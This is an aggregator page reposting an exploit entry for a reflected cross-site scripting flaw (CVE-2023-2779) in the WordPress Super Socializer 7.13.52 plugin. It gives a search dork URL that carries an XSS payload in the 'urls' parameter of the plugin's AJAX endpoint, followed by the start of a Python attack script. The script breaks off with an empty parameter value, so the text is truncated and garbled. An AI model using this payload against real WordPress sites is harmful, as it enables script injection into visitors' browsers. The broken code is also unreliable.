vimarsana.com
Home
Live Updates
WordPress Super Socializer 7.13.52 Cross Site Scripting : vi
WordPress Super Socializer 7.13.52 Cross Site Scripting : vi
WordPress Super Socializer 7.13.52 Cross Site Scripting
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable_param = ""#
Related Keywords
Amirhossein Bahramizadeh ,
,
Exploit Title ,
Super Socializer ,
Exploit Author ,
Vendor Homepage ,